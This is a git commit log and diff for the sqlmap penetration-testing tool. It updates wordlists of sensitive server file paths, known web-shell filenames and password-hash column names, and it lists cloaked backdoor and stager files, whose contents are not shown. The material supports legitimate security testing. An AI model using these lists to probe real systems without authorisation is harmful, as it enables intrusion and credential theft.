6cd0b1120f Minor update 2020-03-06 12:26:31 +01:00
Miroslav Stampar
97ccf4ca66 Minor patch 2020-03-06 12:21:26 +01:00
Miroslav Stampar
8cc516dc5f Bug fix (wrong coloring in some cases) 2020-03-05 14:02:27 +01:00
Miroslav Stampar
8e39c6fc3d Minor update 2020-03-04 22:55:35 +01:00
Miroslav Stampar
d9e540e8b2 Couple of minor patches 2020-03-04 22:43:50 +01:00
Miroslav Stampar
e0ad99d534 Trivial refactoring 2020-03-03 14:40:40 +01:00
Miroslav Stampar
5f5ee6ca68 Fixes #4130 2020-03-03 14:35:38 +01:00
Miroslav Stampar
7a5538ab3e Minor just in case patch 2020-03-03 14:32:01 +01:00
Miroslav Stampar
125de093df Adding support for FrontBase 2020-03-02 12:43:12 +01:00
Miroslav Stampar
dc6e7321e9 Cleaning something something 2020-02-28 14:55:48 +01:00
Miroslav Stampar
1023da405a More Python 3.9 fixing (can't wait for Python 10.7) 2020-02-28 14:44:27 +01:00
Miroslav Stampar
013af3235e I would die for Python3(.9) 2020-02-28 14:37:37 +01:00
Miroslav Stampar
2a1e812288 Some more Python 3.9 patching 2020-02-28 14:24:50 +01:00
Miroslav Stampar
44b7cc7d17 Travis patch 2020-02-28 14:11:16 +01:00
Miroslav Stampar
60a2d74f2b Fixes #4126 2020-02-28 14:08:43 +01:00
Miroslav Stampar
83fecfc1ba Minor patch 2020-02-27 14:31:43 +01:00
Miroslav Stampar
86c6e3d5fc Minor adjustment 2020-02-26 21:47:10 +01:00
Miroslav Stampar
5eb2263c42 Adding support for eXtremeDB 2020-02-26 17:33:47 +01:00
Miroslav Stampar
7ff77ef052 Adding support for InterSystems Cache (and IRIS) 2020-02-25 12:36:07 +01:00
Miroslav Stampar
5c82f30fd8 Trivial update 2020-02-18 10:00:23 +01:00
Miroslav Stampar
3f17dc4747 Fixes #4113 2020-02-17 13:48:22 +01:00
Miroslav Stampar
e1502e0cea Fixes #4118 2020-02-17 12:24:23 +01:00
Miroslav Stampar
c3fe9a0d47 Fixes #4116 2020-02-17 11:50:37 +01:00
Miroslav Stampar
f8b2cb5a0a Fixes #4115 2020-02-17 11:43:12 +01:00
Miroslav Stampar
597013477d Minor update 2020-02-13 14:24:53 +01:00
Miroslav Stampar
0453a2827c Couple of patches 2020-02-12 16:21:09 +01:00
Miroslav Stampar
0605f14d87 Couple of fixes for SAP MaxDB 2020-02-11 15:33:17 +01:00
Miroslav Stampar
176e89d978 Minor update 2020-02-10 17:35:38 +01:00
Miroslav Stampar
b7cdcebcea Minor patch for HSQLDB 2020-02-10 17:22:36 +01:00
Miroslav Stampar
1fb1a05a78 Couple of patches (CockroachDB, Drizzle, Firebird related) 2020-02-10 16:22:58 +01:00
Miroslav Stampar
2d48b8effa Minor update 2020-02-10 12:57:04 +01:00
Miroslav Stampar
4ef9557ccd Minor update 2020-02-07 16:33:22 +01:00
Miroslav Stampar
3513ca66fe Minor beautification 2020-02-07 14:26:01 +01:00
Miroslav Stampar
6467c63c24 Patch for couple of bugs found during bed-testing 2020-02-07 14:02:45 +01:00
Miroslav Stampar
f19f38d1d5 Fixes #4102 2020-02-07 10:12:33 +01:00
Miroslav Stampar
a0b279848d Trivial update 2020-02-07 00:30:02 +01:00
Miroslav Stampar
ec80009812 Minor refactoring 2020-02-07 00:06:09 +01:00
Miroslav Stampar
19e08416b5 Should fix broken Travis 2020-02-06 22:52:45 +01:00
Miroslav Stampar
6825bf85a4 Debugging broken Travis (2) 2020-02-06 22:44:37 +01:00
Miroslav Stampar
4fa39f4539 Debugging broken Travis 2020-02-06 22:34:59 +01:00
Miroslav Stampar
a989e1abfe Minor refactoring 2020-02-06 22:15:31 +01:00
Miroslav Stampar
c71bdf5c9e Minor 'patch' for #4095 2020-02-06 14:26:42 +01:00
Miroslav Stampar
1b92acc033 Fixes #4105 2020-02-06 14:20:33 +01:00
Miroslav Stampar
f968b23f63 Minor update 2020-02-06 14:17:14 +01:00
Miroslav Stampar
5f39016af7 Adding recognition of Amazon Aurora forks 2020-02-03 22:11:19 +01:00
Miroslav Stampar
1dd400f93d Minor patch 2020-02-03 16:54:00 +01:00
Miroslav Stampar
feb1df6a05 Adding support for Apache Ignite (H2 fork) 2020-02-03 13:47:31 +01:00
Miroslav Stampar
4772a9243a Minor update 2020-02-03 11:52:42 +01:00
Miroslav Stampar
8649021b78 Adding support for Drizzle (MySQL fork) 2020-02-03 11:46:03 +01:00
Miroslav Stampar
9d6c931faa Finalizing support for Cubrid 2020-02-03 11:33:19 +01:00
Miroslav Stampar
264a270985 Adding initial support for Cubrid 2020-02-03 01:58:12 +01:00
Miroslav Stampar
4278bbce11 Patch for sporadic --parse-errors in generic SQL errors (e.g. CrateDB) 2020-02-02 22:01:57 +01:00
Miroslav Stampar
db126af86a Minor generalization for special cases 2020-02-02 21:07:53 +01:00
Miroslav Stampar
18b72e605a Trivial update 2020-02-02 14:59:13 +01:00
Miroslav Stampar
0e4232f533 Adding support for CrateDB 2020-02-02 14:51:24 +01:00
Miroslav Stampar
e448905eb1 Fixes #4085 2020-02-01 15:30:01 +01:00
Miroslav Stampar
ee7aa68da8 Trivial patch for #4099 2020-02-01 14:39:11 +01:00
467 changed files with 10503 additions and 1815 deletions
Expand all files Collapse all files

5
.travis.yml
View File

@@ -9,9 +9,8 @@ jobs:
dist: trusty
- python: 3.6
dist: trusty
- python: 3.8
dist: xenial
sudo: false
- python: nightly
dist: bionic
git:
depth: 1
script:

2
LICENSE
View File

@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
sqlmap is (C) 2006-2020 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
sqlmap is (C) 2006-2021 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free

4
README.md
View File

@@ -4,7 +4,7 @@
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
**The sqlmap project is currently searching for sponsor(s).**
**sqlmap is sponsored by [SpyderSec](https://spydersec.com/).**
Screenshots
----
@@ -64,7 +64,7 @@ Translations
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-FA.md)
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)

3
data/html/index.html
View File

@@ -4,6 +4,7 @@
<html lang="en">
<head>
<title>DEMO</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
@@ -74,7 +75,7 @@
<div class="sidebar-nav navbar-collapse">
<ul class="nav" id="side-menu">
<li>
<a href="#"><i class="glyphicon glyphicon-home"></i> Options<span class="arrow"></span></a>
<a href="#"><em class="glyphicon glyphicon-home"></em> Options<span class="arrow"></span></a>
<ul class="nav nav-second-level">
<li><a>Target</a></li>
<li><a>Request</a></li>

6
data/shell/README.txt
View File

@@ -1,7 +1,7 @@
Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility.
Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
To prepare the original scripts to the cloaked form use this command:
find backdoors/backdoor.* stagers/stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \;
find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
To get back them into the original form use this:
find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \;
find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;

BIN
data/shell/backdoors/backdoor.asp_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.aspx_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.jsp_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.php_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.asp_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.aspx_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.jsp_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.php_
View File

Binary file not shown.

5
data/txt/common-columns.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
id
@@ -798,7 +798,9 @@ news
nick
number
nummer
passhash
pass_hash
password_hash
passwordsalt
personal_key
phone
@@ -2726,3 +2728,4 @@ confidential
# Misc
u_pass
hashedPw

131
data/txt/common-files.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Reference: https://gist.github.com/sckalath/78ad449346171d29241a
@@ -679,17 +679,6 @@
/.htaccess
/.htpasswd
/[jboss]/server/default/conf/jboss-minimal.xml
/[jboss]/server/default/conf/jboss-service.xml
/[jboss]/server/default/conf/jndi.properties
/[jboss]/server/default/conf/log4j.xml
/[jboss]/server/default/conf/login-config.xml
/[jboss]/server/default/conf/server.log.properties
/[jboss]/server/default/conf/standardjaws.xml
/[jboss]/server/default/conf/standardjboss.xml
/[jboss]/server/default/deploy/jboss-logging.xml
/[jboss]/server/default/log/boot.log
/[jboss]/server/default/log/server.log
/access.log
/access_log
/apache/conf/httpd.conf
@@ -1024,17 +1013,17 @@
/mysql/my.cnf
/mysql/my.ini
/netserver/bin/stable/apache/php.ini
/opt/[jboss]/server/default/conf/jboss-minimal.xml
/opt/[jboss]/server/default/conf/jboss-service.xml
/opt/[jboss]/server/default/conf/jndi.properties
/opt/[jboss]/server/default/conf/log4j.xml
/opt/[jboss]/server/default/conf/login-config.xml
/opt/[jboss]/server/default/conf/server.log.properties
/opt/[jboss]/server/default/conf/standardjaws.xml
/opt/[jboss]/server/default/conf/standardjboss.xml
/opt/[jboss]/server/default/deploy/jboss-logging.xml
/opt/[jboss]/server/default/log/boot.log
/opt/[jboss]/server/default/log/server.log
/opt/jboss/server/default/conf/jboss-minimal.xml
/opt/jboss/server/default/conf/jboss-service.xml
/opt/jboss/server/default/conf/jndi.properties
/opt/jboss/server/default/conf/log4j.xml
/opt/jboss/server/default/conf/login-config.xml
/opt/jboss/server/default/conf/server.log.properties
/opt/jboss/server/default/conf/standardjaws.xml
/opt/jboss/server/default/conf/standardjboss.xml
/opt/jboss/server/default/deploy/jboss-logging.xml
/opt/jboss/server/default/log/boot.log
/opt/jboss/server/default/log/server.log
/opt/apache/apache.conf
/opt/apache/apache2.conf
/opt/apache/conf/apache.conf
@@ -1075,17 +1064,6 @@
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/private/etc/squirrelmail/config/config.php
/private/tmp/[jboss]/server/default/conf/jboss-minimal.xml
/private/tmp/[jboss]/server/default/conf/jboss-service.xml
/private/tmp/[jboss]/server/default/conf/jndi.properties
/private/tmp/[jboss]/server/default/conf/log4j.xml
/private/tmp/[jboss]/server/default/conf/login-config.xml
/private/tmp/[jboss]/server/default/conf/server.log.properties
/private/tmp/[jboss]/server/default/conf/standardjaws.xml
/private/tmp/[jboss]/server/default/conf/standardjboss.xml
/private/tmp/[jboss]/server/default/deploy/jboss-logging.xml
/private/tmp/[jboss]/server/default/log/boot.log
/private/tmp/[jboss]/server/default/log/server.log
/proc/cpuinfo
/proc/devices
/proc/meminfo
@@ -1114,17 +1092,17 @@
/proc/self/stat
/proc/self/status
/proc/version
/program files/[jboss]/server/default/conf/jboss-minimal.xml
/program files/[jboss]/server/default/conf/jboss-service.xml
/program files/[jboss]/server/default/conf/jndi.properties
/program files/[jboss]/server/default/conf/log4j.xml
/program files/[jboss]/server/default/conf/login-config.xml
/program files/[jboss]/server/default/conf/server.log.properties
/program files/[jboss]/server/default/conf/standardjaws.xml
/program files/[jboss]/server/default/conf/standardjboss.xml
/program files/[jboss]/server/default/deploy/jboss-logging.xml
/program files/[jboss]/server/default/log/boot.log
/program files/[jboss]/server/default/log/server.log
/program files/jboss/server/default/conf/jboss-minimal.xml
/program files/jboss/server/default/conf/jboss-service.xml
/program files/jboss/server/default/conf/jndi.properties
/program files/jboss/server/default/conf/log4j.xml
/program files/jboss/server/default/conf/login-config.xml
/program files/jboss/server/default/conf/server.log.properties
/program files/jboss/server/default/conf/standardjaws.xml
/program files/jboss/server/default/conf/standardjboss.xml
/program files/jboss/server/default/deploy/jboss-logging.xml
/program files/jboss/server/default/log/boot.log
/program files/jboss/server/default/log/server.log
/program files/apache group/apache/apache.conf
/program files/apache group/apache/apache2.conf
/program files/apache group/apache/conf/apache.conf
@@ -1177,17 +1155,17 @@
/system/library/webobjects/adaptors/apache2.2/apache.conf
/temp/sess_
/thttpd_log
/tmp/[jboss]/server/default/conf/jboss-minimal.xml
/tmp/[jboss]/server/default/conf/jboss-service.xml
/tmp/[jboss]/server/default/conf/jndi.properties
/tmp/[jboss]/server/default/conf/log4j.xml
/tmp/[jboss]/server/default/conf/login-config.xml
/tmp/[jboss]/server/default/conf/server.log.properties
/tmp/[jboss]/server/default/conf/standardjaws.xml
/tmp/[jboss]/server/default/conf/standardjboss.xml
/tmp/[jboss]/server/default/deploy/jboss-logging.xml
/tmp/[jboss]/server/default/log/boot.log
/tmp/[jboss]/server/default/log/server.log
/tmp/jboss/server/default/conf/jboss-minimal.xml
/tmp/jboss/server/default/conf/jboss-service.xml
/tmp/jboss/server/default/conf/jndi.properties
/tmp/jboss/server/default/conf/log4j.xml
/tmp/jboss/server/default/conf/login-config.xml
/tmp/jboss/server/default/conf/server.log.properties
/tmp/jboss/server/default/conf/standardjaws.xml
/tmp/jboss/server/default/conf/standardjboss.xml
/tmp/jboss/server/default/deploy/jboss-logging.xml
/tmp/jboss/server/default/log/boot.log
/tmp/jboss/server/default/log/server.log
/tmp/access.log
/tmp/sess_
/usr/apache/conf/httpd.conf
@@ -1202,17 +1180,17 @@
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/[jboss]/server/default/conf/jboss-minimal.xml
/usr/local/[jboss]/server/default/conf/jboss-service.xml
/usr/local/[jboss]/server/default/conf/jndi.properties
/usr/local/[jboss]/server/default/conf/log4j.xml
/usr/local/[jboss]/server/default/conf/login-config.xml
/usr/local/[jboss]/server/default/conf/server.log.properties
/usr/local/[jboss]/server/default/conf/standardjaws.xml
/usr/local/[jboss]/server/default/conf/standardjboss.xml
/usr/local/[jboss]/server/default/deploy/jboss-logging.xml
/usr/local/[jboss]/server/default/log/boot.log
/usr/local/[jboss]/server/default/log/server.log
/usr/local/jboss/server/default/conf/jboss-minimal.xml
/usr/local/jboss/server/default/conf/jboss-service.xml
/usr/local/jboss/server/default/conf/jndi.properties
/usr/local/jboss/server/default/conf/log4j.xml
/usr/local/jboss/server/default/conf/login-config.xml
/usr/local/jboss/server/default/conf/server.log.properties
/usr/local/jboss/server/default/conf/standardjaws.xml
/usr/local/jboss/server/default/conf/standardjboss.xml
/usr/local/jboss/server/default/deploy/jboss-logging.xml
/usr/local/jboss/server/default/log/boot.log
/usr/local/jboss/server/default/log/server.log
/usr/local/apache/apache.conf
/usr/local/apache/apache2.conf
/usr/local/apache/conf/access.conf
@@ -1802,3 +1780,22 @@
/usr/share/squirrelmail/config/config.php
/private/etc/squirrelmail/config/config.php
/srv/www/htdos/squirrelmail/config/config.php
# Web shells
/var/www/html/backdoor.php
/var/www/html/b374k.php
/var/www/html/c99.php
/var/www/html/cmd.php
/var/www/html/r57.php
/var/www/html/shell.php
/var/www/html/wso.php
# Misc
/etc/lib/nfs/etab
/app/app.js
/app/configure.js
/app/config/config.json
/flag.txt
/readflag

2
data/txt/common-outputs.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
[Banners]

80
data/txt/common-tables.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
users
@@ -442,6 +442,7 @@ exchange
Status
WORKS_ON
lines
testusers
booleantests
QRTZ_SIMPLE_TRIGGERS
mobile_menu
@@ -1824,6 +1825,7 @@ jos_comprofiler_members
jos_joomblog_users
jos_moschat_users
knews_lostpass
korisnik
korisnici
kpro_adminlogs
kpro_user
@@ -2214,6 +2216,7 @@ admin_pwd
admin_pass
adminpassword
admin_password
admin_passwords
usrpass
usr_pass
pass
@@ -3496,3 +3499,78 @@ utenti
wm_products
wp_payout_history
zamowienia
# https://deliciousbrains.com/tour-wordpress-database/
wp_blogmeta
wp_blogs
wp_blog_versions
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_registration_log
wp_signups
wp_site
wp_sitemeta
wp_termmeta
wp_term_relationships
wp_terms
wp_term_taxonomy
wp_usermeta
wp_users
# https://docs.joomla.org/Tables
assets
bannerclient
banner
bannertrack
categories
components
contact_details
content_frontpage
content_rating
content
core_acl_aro_groups
core_acl_aro_map
core_acl_aro_sections
core_acl_aro
core_acl_groups_aro_map
core_log_items
core_log_searches
extensions
groups
languages
menu
menu_types
messages_cfg
messages
migration_backlinks
modules_menu
modules
newsfeeds
plugins
poll_data
poll_date
poll_menu
polls
redirect_links
Schemas
sections
session
stats_agents
templates_menu
template_styles
update_categories
update_sites_extensions
update_sites
updates
usergroups
user_profiles
users
user_usergroup_map
viewlevels
weblinks

424
data/txt/keywords.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
@@ -259,6 +259,7 @@ YEAR
ZONE
# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html)
ADD
ALL
ALTER
@@ -450,3 +451,424 @@ WITH
WRITEXOR
YEAR_MONTH
ZEROFILL
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
ABS
ACOS
ALL
ALLOCATE
ALTER
ANALYSE
ANALYZE
AND
ANY
ARE
ARRAY
ARRAY_AGG
ARRAY_MAX_CARDINALITY
AS
ASC
ASENSITIVE
ASIN
ASYMMETRIC
AT
ATAN
ATOMIC
AUTHORIZATION
AVG
BEGIN
BEGIN_FRAME
BEGIN_PARTITION
BETWEEN
BIGINT
BINARY
BLOB
BOOLEAN
BOTH
BY
CALL
CALLED
CARDINALITY
CASCADED
CASE
CAST
CEIL
CEILING
CHAR
CHARACTER
CHARACTER_LENGTH
CHAR_LENGTH
CHECK
CLASSIFIER
CLOB
CLOSE
COALESCE
COLLATE
COLLATION
COLLECT
COLUMN
COMMIT
CONCURRENTLY
CONDITION
CONNECT
CONSTRAINT
CONTAINS
CONVERT
COPY
CORR
CORRESPONDING
COS
COSH
COUNT
COVAR_POP
COVAR_SAMP
CREATE
CROSS
CUBE
CUME_DIST
CURRENT
CURRENT_CATALOG
CURRENT_DATE
CURRENT_DEFAULT_TRANSFORM_GROUP
CURRENT_PATH
CURRENT_ROLE
CURRENT_ROW
CURRENT_SCHEMA
CURRENT_TIME
CURRENT_TIMESTAMP
CURRENT_TRANSFORM_GROUP_FOR_TYPE
CURRENT_USER
CURSOR
CYCLE
DATALINK
DATE
DAY
DEALLOCATE
DEC
DECFLOAT
DECIMAL
DECLARE
DEFAULT
DEFERRABLE
DEFINE
DELETE
DENSE_RANK
DEREF
DESC
DESCRIBE
DETERMINISTIC
DISCONNECT
DISTINCT
DLNEWCOPY
DLPREVIOUSCOPY
DLURLCOMPLETE
DLURLCOMPLETEONLY
DLURLCOMPLETEWRITE
DLURLPATH
DLURLPATHONLY
DLURLPATHWRITE
DLURLSCHEME
DLURLSERVER
DLVALUE
DO
DOUBLE
DROP
DYNAMIC
EACH
ELEMENT
ELSE
EMPTY
END
END-EXEC
END_FRAME
END_PARTITION
EQUALS
ESCAPE
EVERY
EXCEPT
EXEC
EXECUTE
EXISTS
EXP
EXTERNAL
EXTRACT
FALSE
FETCH
FILTER
FIRST_VALUE
FLOAT
FLOOR
FOR
FOREIGN
FRAME_ROW
FREE
FREEZE
FROM
FULL
FUNCTION
FUSION
GET
GLOBAL
GRANT
GROUP
GROUPING
GROUPS
HAVING
HOLD
HOUR
IDENTITY
ILIKE
IMPORT
IN
INDICATOR
INITIAL
INITIALLY
INNER
INOUT
INSENSITIVE
INSERT
INT
INTEGER
INTERSECT
INTERSECTION
INTERVAL
INTO
IS
ISNULL
JOIN
JSON_ARRAY
JSON_ARRAYAGG
JSON_EXISTS
JSON_OBJECT
JSON_OBJECTAGG
JSON_QUERY
JSON_TABLE
JSON_TABLE_PRIMITIVE
JSON_VALUE
LAG
LANGUAGE
LARGE
LAST_VALUE
LATERAL
LEAD
LEADING
LEFT
LIKE
LIKE_REGEX
LIMIT
LISTAGG
LN
LOCAL
LOCALTIME
LOCALTIMESTAMP
LOG
LOG10
LOWER
MATCH
MATCHES
MATCH_NUMBER
MATCH_RECOGNIZE
MAX
MEASURES
MEMBER
MERGE
METHOD
MIN
MINUTE
MOD
MODIFIES
MODULE
MONTH
MULTISET
NATIONAL
NATURAL
NCHAR
NCLOB
NEW
NO
NONE
NORMALIZE
NOT
NOTNULL
NTH_VALUE
NTILE
NULL
NULLIF
NUMERIC
OCCURRENCES_REGEX
OCTET_LENGTH
OF
OFFSET
OLD
OMIT
ON
ONE
ONLY
OPEN
OR
ORDER
OUT
OUTER
OVER
OVERLAPS
OVERLAY
PARAMETER
PARTITION
PATTERN
PER
PERCENT
PERCENTILE_CONT
PERCENTILE_DISC
PERCENT_RANK
PERIOD
PERMUTE
PLACING
PORTION
POSITION
POSITION_REGEX
POWER
PRECEDES
PRECISION
PREPARE
PRIMARY
PROCEDURE
PTF
RANGE
RANK
READS
REAL
RECURSIVE
REF
REFERENCES
REFERENCING
REGR_AVGX
REGR_AVGY
REGR_COUNT
REGR_INTERCEPT
REGR_R2
REGR_SLOPE
REGR_SXX
REGR_SXY
REGR_SYY
RELEASE
RESULT
RETURN
RETURNING
RETURNS
REVOKE
RIGHT
ROLLBACK
ROLLUP
ROW
ROWS
ROW_NUMBER
RUNNING
SAVEPOINT
SCOPE
SCROLL
SEARCH
SECOND
SEEK
SELECT
SENSITIVE
SESSION_USER
SET
SHOW
SIMILAR
SIN
SINH
SKIP
SMALLINT
SOME
SPECIFIC
SPECIFICTYPE
SQL
SQLEXCEPTION
SQLSTATE
SQLWARNING
SQRT
START
STATIC
STDDEV_POP
STDDEV_SAMP
SUBMULTISET
SUBSET
SUBSTRING
SUBSTRING_REGEX
SUCCEEDS
SUM
SYMMETRIC
SYSTEM
SYSTEM_TIME
SYSTEM_USER
TABLE
TABLESAMPLE
TAN
TANH
THEN
TIME
TIMESTAMP
TIMEZONE_HOUR
TIMEZONE_MINUTE
TO
TRAILING
TRANSLATE
TRANSLATE_REGEX
TRANSLATION
TREAT
TRIGGER
TRIM
TRIM_ARRAY
TRUE
TRUNCATE
UESCAPE
UNION
UNIQUE
UNKNOWN
UNMATCHED
UNNEST
UPDATE
UPPER
USER
USING
VALUE
VALUES
VALUE_OF
VARBINARY
VARCHAR
VARIADIC
VARYING
VAR_POP
VAR_SAMP
VERBOSE
VERSIONING
WHEN
WHENEVER
WHERE
WIDTH_BUCKET
WINDOW
WITH
WITHIN
WITHOUT
XML
XMLAGG
XMLATTRIBUTES
XMLBINARY
XMLCAST
XMLCOMMENT
XMLCONCAT
XMLDOCUMENT
XMLELEMENT
XMLEXISTS
XMLFOREST
XMLITERATE
XMLNAMESPACES
XMLPARSE
XMLPI
XMLQUERY
XMLSERIALIZE
XMLTABLE
XMLTEXT
XMLVALIDATE
YEAR

4854
data/txt/smalldict.txt
View File

File diff suppressed because it is too large Load Diff

91
data/txt/user-agents.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Opera
@@ -4183,3 +4183,92 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, lik
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
# https://techblog.willshouse.com/2012/01/03/most-common-user-agents/ (Note: Updated December 28th 2020)
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
